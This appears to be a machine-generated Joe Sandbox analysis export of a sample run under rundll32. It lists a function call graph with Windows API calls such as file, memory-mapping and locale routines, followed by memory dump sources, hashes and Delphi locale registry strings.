7762->7761 8004 50f240 7762->8004 8007 510620 7762->8007 7764 51083e 7763->7764 7766 413560 14 API calls 7764->7766 7767 51084f 7766->7767 7767->7567 7770 411140 7769->7770 7771 436899 GetFileAttributesW 7770->7771 7772 43692d GetLastError 7771->7772 7773 4368ad 7771->7773 7777 4368bc 7772->7777 7774 4368d2 CreateFileW 7773->7774 7773->7777 7775 436915 GetLastError 7774->7775 7776 436909 CloseHandle 7774->7776 7775->7777 7776->7777 7777->7561 7779 7f46ad 7778->7779 7781 7f46e5 7779->7781 8022 43c060 7779->8022 7781->7569 7782 579f60 7781->7782 8033 57a260 7782->8033 7785 579ce0 7786 579d34 7785->7786 7789 579d3f 7785->7789 7787 4090f0 TlsGetValue 7786->7787 7787->7789 7788 579dd2 SetLastError 8093 436cd0 7788->8093 7790 4090f0 TlsGetValue 7789->7790 7793 579d77 7789->7793 7790->7793 7791 4090f0 TlsGetValue 7794 579daf 7791->7794 7793->7788 7793->7791 7794->7788 7795 579de7 7796 579e11 CreateFileW 7795->7796 7797 579e8f CloseHandle SetLastError 7796->7797 7798 579e4c SetFileTime 7796->7798 7799 409120 TlsGetValue 7797->7799 7798->7797 7800 579ea9 7799->7800 7801 409120 TlsGetValue 7800->7801 7802 579eb2 7801->7802 7803 409120 TlsGetValue 7802->7803 7804 579ebb 7803->7804 7805 579f70 7804->7805 7806 57a260 47 API calls 7805->7806 7807 579f7b 7806->7807 7807->7584 7809 57a260 47 API calls 7808->7809 7810 579f5b 7809->7810 7811 57a040 7810->7811 7812 57a058 7811->7812 8300 436de0 7812->8300 7816 411d20 14 API calls 7815->7816 7817 7f8aa4 7816->7817 7817->7574 7819 7fb10b 7818->7819 7820 440a70 33 API calls 7819->7820 7822 7fb132 7819->7822 7820->7822 7821 412220 18 API calls 7823 7f95c1 7821->7823 7822->7821 7823->7632 7825 44b3ec 7824->7825 7826 44b3de 7824->7826 7825->7645 7844 44bb90 7826->7844 7829 44b155 7828->7829 7830 44b17c 7829->7830 7831 440a70 33 API calls 7829->7831 7832 440c20 50 API calls 7830->7832 7834 44b1b0 7830->7834 7831->7830 7832->7834 7833 44b1ef 7836 44b247 7833->7836 7837 440c20 50 API calls 7833->7837 7834->7833 7835 440c20 50 API calls 7834->7835 7835->7833 7856 44a6d0 7836->7856 7837->7836 7839 44b265 7840 44b28b 7839->7840 7842 440a70 33 API calls 7839->7842 7841 4113d0 TlsGetValue 7840->7841 7843 44b29e 7841->7843 7842->7840 7843->7647 7846 44bbaa 7844->7846 7848 44b5e0 7846->7848 7847 44bbde 7847->7825 7852 44b608 7848->7852 7849 44b624 GetACP 7851 44b63f GetCPInfo 7849->7851 7850 44b632 7850->7851 7853 44b66d 7851->7853 7854 44b682 7851->7854 7852->7849 7852->7850 7855 440a70 33 API calls 7853->7855 7854->7847 7855->7854 7857 44a6de 7856->7857 7864 44a6f8 7856->7864 7860 440a70 33 API calls 7857->7860 7857->7864 7858 44a72e 7861 440c20 50 API calls 7858->7861 7862 44a764 7858->7862 7859 440c20 50 API calls 7859->7858 7860->7864 7861->7862 7863 44a7b3 7862->7863 7865 440c20 50 API calls 7862->7865 7863->7839 7864->7858 7864->7859 7865->7863 7867 44afc0 7866->7867 7868 44afda 7866->7868 7867->7868 7869 44bb90 35 API calls 7867->7869 7868->7660 7869->7868 7871 410430 TlsGetValue 7870->7871 7872 434b21 7871->7872 7874 434b2f 7872->7874 7884 4106f0 7872->7884 7874->7682 7876 434b73 7875->7876 7877 4100a0 TlsGetValue 7876->7877 7878 434b8c 7877->7878 7879 434ba2 7878->7879 7880 434b98 CharLowerBuffW 7878->7880 7879->7691 7880->7879 7882 4100a0 TlsGetValue 7881->7882 7883 4111aa 7882->7883 7883->7710 7885 410610 TlsGetValue 7884->7885 7886 4106f9 7885->7886 7886->7874 7890 57b0d0 7887->7890 7889 57b7eb 7889->7725 7891 57b0e8 7890->7891 7893 57b10f 7890->7893 7892 440a70 33 API calls 7891->7892 7891->7893 7892->7893 7893->7889 7895 44871c 7894->7895 7896 4117a0 TlsGetValue 7895->7896 7897 437442 7896->7897 7897->7495 7899 4374d0 2 API calls 7898->7899 7900 57ae7d GetLastError 7899->7900 7901 57ae86 7900->7901 7902 57aeab 7900->7902 7901->7902 7904 43ea00 3 API calls 7901->7904 7903 40fde0 TlsGetValue 7902->7903 7905 5792b2 7903->7905 7906 57ae99 7904->7906 7908 579160 7905->7908 7937 440800 7906->7937 7941 579bc0 7908->7941 7910 579180 7916 5791bc 7910->7916 7960 57aef0 7910->7960 7912 40fde0 TlsGetValue 7913 5791ce 7912->7913 7917 436a90 7913->7917 7914 57919a 7915 440a70 33 API calls 7914->7915 7914->7916 7915->7916 7916->7912 7918 436abd 7917->7918 7919 436adf 7918->7919 7921 440a70 33 API calls 7918->7921 7999 442b60 7919->7999 7921->7919 7923 4104b0 TlsGetValue 7924 436b08 7923->7924 7925 436960 4 API calls 7924->7925 7927 436b13 7925->7927 7926 40fec0 TlsGetValue 7928 436b9f 7926->7928 7930 437200 TlsGetValue 7927->7930 7932 436b2a 7927->7932 7936 436b51 7927->7936 7929 40fde0 TlsGetValue 7928->7929 7931 436ba8 7929->7931 7930->7932 7931->7756 7933 437200 TlsGetValue 7932->7933 7932->7936 7934 436b6c 7933->7934 7935 436a90 37 API calls 7934->7935 7935->7936 7936->7926 7938 44081e 7937->7938 7939 410430 TlsGetValue 7938->7939 7940 440842 7939->7940 7940->7902 7975 57a3e0 7941->7975 7943 579be7 7979 57b460 7943->7979 7946 579c09 7986 434ce0 7946->7986 7947 440a70 33 API calls 7947->7946 7950 440a70 33 API calls 7951 579c3a 7950->7951 7952 440a70 33 API calls 7951->7952 7953 579c66 7951->7953 7952->7953 7954 579c9b 7953->7954 7996 579a10 7953->7996 7955 40fde0 TlsGetValue 7954->7955 7957 579cad 7955->7957 7957->7910 7959 440a70 33 API calls 7959->7954 7961 411190 TlsGetValue 7960->7961 7962 57af35 7961->7962 7963 411190 TlsGetValue 7962->7963 7964 57af46 7963->7964 7965 411580 TlsGetValue 7964->7965 7966 57af57 7965->7966 7967 4117a0 TlsGetValue 7966->7967 7968 57b068 7967->7968 7969 57b08a 7968->7969 7970 411190 TlsGetValue 7968->7970 7971 40fec0 TlsGetValue 7969->7971 7973 57b07d 7970->7973 7972 57b09a 7971->7972 7972->7914 7974 4114b0 TlsGetValue 7973->7974 7974->7969 7976 57a3ee 7975->7976 7977 440a70 33 API calls 7976->7977 7978 57a414 7976->7978 7977->7978 7978->7943 7980 434ce0 TlsGetValue 7979->7980 7983 57b490 7980->7983 7981 40fec0 TlsGetValue 7982 579bf0 7981->7982 7982->7946 7982->7947 7984 411190 TlsGetValue 7983->7984 7985 57b4c3 7983->7985 7984->7985 7985->7981 7987 434cf9 7986->7987 7991 434d38 7987->7991 7993 434d29 7987->7993 7988 434d55 7989 40fde0 TlsGetValue 7988->7989 7992 434d36 7989->7992 7990 434d5f 7994 448740 TlsGetValue 7990->7994 7991->7988 7991->7990 7992->7950 7992->7951 7995 410430 TlsGetValue 7993->7995 7994->7992 7995->7992 7997 436960 4 API calls 7996->7997 7998 579a19 7997->7998 7998->7954 7998->7959 8000 410430 TlsGetValue 7999->8000 8001 442b70 8000->8001 8002 436afb 8001->8002 8003 4113d0 TlsGetValue 8001->8003 8002->7923 8003->8002 8010 50f260 8004->8010 8016 510640 8007->8016 8011 50f289 8010->8011 8013 440a70 33 API calls 8011->8013 8014 50f2a9 8011->8014 8012 50f251 8012->7762 8013->8014 8014->8012 8015 440a70 33 API calls 8014->8015 8015->8014 8017 510669 8016->8017 8019 440a70 33 API calls 8017->8019 8020 510689 8017->8020 8018 510631 8018->7762 8019->8020 8020->8018 8021 440a70 33 API calls 8020->8021 8021->8020 8023 43c0c1 8022->8023 8024 43c070 8022->8024 8023->7781 8024->8023 8026 43bf60 8024->8026 8029 43bed0 8026->8029 8030 43bee3 8029->8030 8031 434200 50 API calls 8030->8031 8032 43bf19 8030->8032 8031->8032 8032->8023 8034 57a3e0 33 API calls 8033->8034 8035 57a297 8034->8035 8036 57b460 TlsGetValue 8035->8036 8037 57a2a0 8036->8037 8038 57a2b9 8037->8038 8039 440a70 33 API calls 8037->8039 8040 434ce0 TlsGetValue 8038->8040 8039->8038 8041 57a2ce 8040->8041 8042 440a70 33 API calls 8041->8042 8043 57a2ea 8041->8043 8042->8043 8044 57a316 8043->8044 8045 440a70 33 API calls 8043->8045 8046 57ae50 6 API calls 8044->8046 8045->8044 8047 57a32b 8046->8047 8060 57aad0 8047->8060 8050 436960 4 API calls 8051 57a346 8050->8051 8052 57a35f 8051->8052 8053 440a70 33 API calls 8051->8053 8054 57a394 8052->8054 8090 57a070 8052->8090 8053->8052 8056 40fec0 TlsGetValue 8054->8056 8058 579f6b 8056->8058 8058->7785 8059 440a70 33 API calls 8059->8054 8061 57ab26 8060->8061 8062 40fde0 TlsGetValue 8061->8062 8063 57ab33 8062->8063 8064 434ce0 TlsGetValue 8063->8064 8065 57ab43 8064->8065 8066 4104b0 TlsGetValue 8065->8066 8067 57ab53 8066->8067 8068 411190 TlsGetValue 8067->8068 8069 57ab64 8068->8069 8070 411190 TlsGetValue 8069->8070 8071 57ab75 8070->8071 8072 411580 TlsGetValue 8071->8072 8073 57ab86 8072->8073 8074 411190 TlsGetValue 8073->8074 8082 57abe6 8073->8082 8074->8082 8075 4117a0 TlsGetValue 8076 57ad8e 8075->8076 8077 410430 TlsGetValue 8076->8077 8078 57ad9e 8077->8078 8079 40fde0 TlsGetValue 8078->8079 8080 57ada8 8079->8080 8081 40fec0 TlsGetValue 8080->8081 8083 57adb8 8081->8083 8082->8075 8084 40fde0 TlsGetValue 8083->8084 8085 57adc1 8084->8085 8086 40fde0 TlsGetValue 8085->8086 8087 57adca 8086->8087 8088 40fde0 TlsGetValue 8087->8088 8089 57a338 8088->8089 8089->8050 8091 436880 5 API calls 8090->8091 8092 57a079 8091->8092 8092->8054 8092->8059 8094 411140 8093->8094 8095 436d01 GetFileAttributesW 8094->8095 8096 436d21 8095->8096 8097 436d84 8095->8097 8111 434060 8096->8111 8098 40fec0 TlsGetValue 8097->8098 8100 436d94 8098->8100 8101 40fde0 TlsGetValue 8100->8101 8102 436d9d 8101->8102 8102->7795 8103 436d34 8103->8097 8104 436d70 8103->8104 8105 437200 TlsGetValue 8103->8105 8106 436d79 GetFileAttributesW 8104->8106 8107 436d52 8105->8107 8106->8097 8124 442b00 8107->8124 8110 411580 TlsGetValue 8110->8104 8112 43408b 8111->8112 8113 434175 8112->8113 8114 436880 5 API calls 8112->8114 8113->8103 8115 4340a1 8114->8115 8115->8113 8129 436470 8115->8129 8117 4340b5 8117->8113 8118 4340ca GetFileAttributesW 8117->8118 8118->8113 8119 4340df 8118->8119 8119->8113 8120 434115 CreateFileW 8119->8120 8120->8113 8121 434150 8120->8121 8160 433d50 8121->8160 8125 410430 TlsGetValue 8124->8125 8126 442b10 8125->8126 8127 436d5f 8126->8127 8128 4114b0 TlsGetValue 8126->8128 8127->8110 8128->8127 8130 413390 18 API calls 8129->8130 8131 4364ca 8130->8131 8132 413390 18 API calls 8131->8132 8133 4364e8 8132->8133 8134 436960 4 API calls 8133->8134 8135 4364fe 8134->8135 8136 43650d 8135->8136 8137 436880 5 API calls 8135->8137 8140 436624 8136->8140 8194 4372f0 8136->8194 8137->8136 8142 417be0 33 API calls 8140->8142 8141 442b00 TlsGetValue 8143 436532 8141->8143 8144 436634 8142->8144 8146 43653e GetVolumeInformationW 8143->8146 8145 440800 TlsGetValue 8144->8145 8151 4365e3 8145->8151 8147 43661f 8146->8147 8150 436589 GetDriveTypeW 8146->8150 8204 443d70 GetLastError 8147->8204 8150->8151 8152 40fec0 TlsGetValue 8151->8152 8153 43665e 8152->8153 8154 413560 14 API calls 8153->8154 8155 43666e 8154->8155 8156 413560 14 API calls 8155->8156 8157 43667e 8156->8157 8158 40fde0 TlsGetValue 8157->8158 8159 43668a 8158->8159 8159->8117 8161 40fde0 TlsGetValue 8160->8161 8166 433dbf 8161->8166 8162 433e67 8163 433e7d CreateFileMappingW 8162->8163 8164 433f6a 8162->8164 8163->8164 8165 433ebe MapViewOfFile 8163->8165 8167 433e5b 8164->8167 8232 433c00 8164->8232 8168 433ef1 GetCurrentProcess 8165->8168 8169 433f5d CloseHandle 8165->8169 8166->8162 8180 433e27 8166->8180 8172 40fec0 TlsGetValue 8167->8172 8229 4234a0 8168->8229 8169->8164 8175 433fe0 CloseHandle 8172->8175 8174 433f11 8177 433f50 UnmapViewOfFile 8174->8177 8179 411240 TlsGetValue 8174->8179 8175->8113 8176 410430 TlsGetValue 8178 433f96 8176->8178 8177->8169 8178->8167 8183 433aa0 TlsGetValue 8178->8183 8181 433f29 8179->8181 8182 411240 TlsGetValue 8180->8182 8184 433aa0 TlsGetValue 8181->8184 8185 433e3b 8182->8185 8187 433fb9 8183->8187 8188 433f39 8184->8188 8217 433aa0 8185->8217 8191 410430 TlsGetValue 8187->8191 8189 410430 TlsGetValue 8188->8189 8192 433f49 8189->8192 8191->8167 8192->8177 8193 410430 TlsGetValue 8193->8167 8195 437309 8194->8195 8196 437324 8195->8196 8201 437344 8195->8201 8199 4117a0 TlsGetValue 8196->8199 8197 4373f1 8198 40fde0 TlsGetValue 8197->8198 8200 436522 8198->8200 8199->8200 8200->8141 8201->8197 8202 437383 8201->8202 8203 4117a0 TlsGetValue 8202->8203 8203->8200 8207 443d90 8204->8207 8208 443e03 8207->8208 8209 443daf 8207->8209 8211 440a70 33 API calls 8208->8211 8210 43ea00 TlsGetValue FormatMessageW LocalFree 8209->8210 8212 443dc8 8210->8212 8213 443e01 8211->8213 8214 440c20 50 API calls 8212->8214 8215 40fde0 TlsGetValue 8213->8215 8214->8213 8216 443d82 8215->8216 8216->8140 8222 433ae1 8217->8222 8218 433b94 8219 40fec0 TlsGetValue 8218->8219 8220 433bc4 8219->8220 8220->8193 8221 411240 TlsGetValue 8221->8222 8222->8218 8222->8221 8223 433b41 8222->8223 8224 4111e0 TlsGetValue 8223->8224 8225 433b69 8224->8225 8226 4117a0 TlsGetValue 8225->8226 8227 433b83 8226->8227 8228 411580 TlsGetValue 8227->8228 8228->8218 8243 422f10 8229->8243 8231 4234ba 8231->8174 8233 40fde0 TlsGetValue 8232->8233 8235 433c24 8233->8235 8234 433ce7 8234->8176 8237 433c49 8235->8237 8291 4208c0 8235->8291 8237->8234 8238 4090f0 TlsGetValue 8237->8238 8240 433c98 8238->8240 8239 433cdd 8242 409120 TlsGetValue 8239->8242 8240->8239 8241 4111e0 TlsGetValue 8240->8241 8241->8239 8242->8234 8244 422f3f 8243->8244 8245 422f22 8243->8245 8244->8231 8245->8244 8246 4208c0 TlsGetValue GetProcAddress 8245->8246 8247 422f59 8246->8247 8248 4208c0 TlsGetValue GetProcAddress 8247->8248 8249 422f73 8248->8249 8250 4208c0 TlsGetValue GetProcAddress 8249->8250 8251 422f8d 8250->8251 8252 4208c0 TlsGetValue GetProcAddress 8251->8252 8253 422fa7 8252->8253 8254 4208c0 TlsGetValue GetProcAddress 8253->8254 8255 422fc1 8254->8255 8256 4208c0 TlsGetValue GetProcAddress 8255->8256 8257 422fdb 8256->8257 8258 4208c0 TlsGetValue GetProcAddress 8257->8258 8259 422ff5 8258->8259 8260 4208c0 TlsGetValue GetProcAddress 8259->8260 8261 42300f 8260->8261 8262 4208c0 TlsGetValue GetProcAddress 8261->8262 8263 423029 8262->8263 8264 4208c0 TlsGetValue GetProcAddress 8263->8264 8265 423043 8264->8265 8266 4208c0 TlsGetValue GetProcAddress 8265->8266 8267 42305d 8266->8267 8268 4208c0 TlsGetValue GetProcAddress 8267->8268 8269 423077 8268->8269 8270 4208c0 TlsGetValue GetProcAddress 8269->8270 8271 423091 8270->8271 8272 4208c0 TlsGetValue GetProcAddress 8271->8272 8273 4230ab 8272->8273 8274 4208c0 TlsGetValue GetProcAddress 8273->8274 8275 4230c5 8274->8275 8276 4208c0 TlsGetValue GetProcAddress 8275->8276 8277 4230df 8276->8277 8278 4208c0 TlsGetValue GetProcAddress 8277->8278 8279 4230f9 8278->8279 8280 4208c0 TlsGetValue GetProcAddress 8279->8280 8281 423113 8280->8281 8282 4208c0 TlsGetValue GetProcAddress 8281->8282 8283 42312d 8282->8283 8284 4208c0 TlsGetValue GetProcAddress 8283->8284 8285 423147 8284->8285 8286 4208c0 TlsGetValue GetProcAddress 8285->8286 8287 423161 8286->8287 8288 4208c0 TlsGetValue GetProcAddress 8287->8288 8289 42317b 8288->8289 8290 4208c0 TlsGetValue GetProcAddress 8289->8290 8290->8244 8292 4208ea GetProcAddress 8291->8292 8293 4208fd 8291->8293 8294 420931 8292->8294 8295 4109e0 TlsGetValue 8293->8295 8296 40fe30 TlsGetValue 8294->8296 8298 42090e 8295->8298 8297 42093b 8296->8297 8297->8237 8299 40fe30 TlsGetValue 8298->8299 8299->8294 8301 4104b0 TlsGetValue 8300->8301 8302 436e26 8301->8302 8303 436e9e 8302->8303 8304 436e38 GetFileAttributesW 8302->8304 8305 436ea7 SetFileAttributesW 8303->8305 8304->8303 8306 436e48 8304->8306 8307 436eb6 GetLastError 8305->8307 8308 436ebe 8305->8308 8309 434060 73 API calls 8306->8309 8307->8308 8310 40fec0 TlsGetValue 8308->8310 8312 436e55 8309->8312 8311 436ece 8310->8311 8311->7596 8312->8303 8313 436e91 8312->8313 8314 437200 TlsGetValue 8312->8314 8315 4104b0 TlsGetValue 8313->8315 8316 436e73 8314->8316 8315->8303 8317 442b00 TlsGetValue 8316->8317 8318 436e80 8317->8318 8319 411580 TlsGetValue 8318->8319 8319->8313 8321 7f4953 8320->8321 8322 7f496c 8321->8322 8323 440a70 33 API calls 8321->8323 8322->6984 8323->8322 8325 7f48f4 8324->8325 8326 440a70 33 API calls 8325->8326 8327 7f490d 8325->8327 8326->8327 8327->6987 8329 7f484d 8328->8329 8330 7f4883 8329->8330 8331 440a70 33 API calls 8329->8331 8332 413560 14 API calls 8330->8332 8331->8330 8333 7f48a0 8332->8333 8333->6970 8335 40ff78 Sleep 8334->8335 8335->7015 8336 417be0 8337 417c0d 8336->8337 8344 417c47 8336->8344 8338 417c17 8337->8338 8339 417c49 8337->8339 8340 413d70 33 API calls 8338->8340 8341 4111e0 TlsGetValue 8339->8341 8342 417c22 8340->8342 8341->8344 8343 4100a0 TlsGetValue 8342->8343 8343->8344

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Open$QueryValue$CloseFileModuleName
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                    • API String ID: 2701450724-3496071916
                    • Opcode ID: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                    • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                    • Opcode Fuzzy Hash: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                    • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                    • GetLocaleInfoW.KERNEL32 ref: 00415277
                      • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                      • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                    • String ID:
                    • API String ID: 3216391948-0
                    • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                    • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 169 4150d2-4150ec call 40fde0 164->169 170 4150ca-4150cd FindClose 164->170 170->169
                    APIs
                    Memory Dump Source
